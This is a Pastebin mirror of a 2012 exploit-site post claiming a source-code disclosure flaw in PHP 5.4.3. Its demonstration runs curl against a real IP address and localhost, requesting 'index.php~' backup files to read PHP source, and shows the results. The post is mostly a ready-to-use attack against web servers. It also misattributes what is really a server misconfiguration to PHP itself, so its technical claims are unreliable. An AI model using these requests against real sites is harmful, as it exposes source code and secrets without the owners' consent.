xanda

Mirror :: PHP 5.4.3 (cli) code read vulnerability

Jun 15th, 2012
126
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Mirror of: http://1337day.com/exploits/18605
  2.  
  3. =============================================================
  4. # Exploit Title: PHP 5.4.3 (cli) code read vulnerability
  5.  
  6. # Date: 2012/13/06
  7.  
  8. # Author: cheki
  9.  
  10. # Software Link: http://php.net/downloads.php
  11.  
  12. # Version: PHP 5.4.3 (cli) (built: May 9 2012 15:06:10)
  13. Copyright (c) 1997-2012 The PHP Group
  14. Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
  15.  
  16. # Category: remote
  17.  
  18. # Tested on: Fedora release 17 (Beefy Miracle)
  19. =============================================================
  20.  
  21. #Demo: [root@cheki]# curl 109.234.119.2/index.php~
  22.  
  23. result: <?php
  24.  
  25. phpinfo();
  26.  
  27. ?>
  28.  
  29. #Target: http://localhost/index.php~
  30.  
  31. result: <?php
  32.  
  33. phpinfo();
  34.  
  35. ?>
  36. ============================================================
  37.  
  38. [root@cheki]# curl 109.234.119.2/index.php
  39.  
  40. result: NULL
  41.  
  42. #Target: http://localhost/index.php
  43.  
  44. result: NULL
  45.  
  46. ===========================================================
  47.  
  48. # Greetings to: kaxa giorgashvili, anuka bolqvadze, 1337day.com members and hacking.ge
  49.  
  50.  
  51. # 1337day.com [2012-06-13]
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×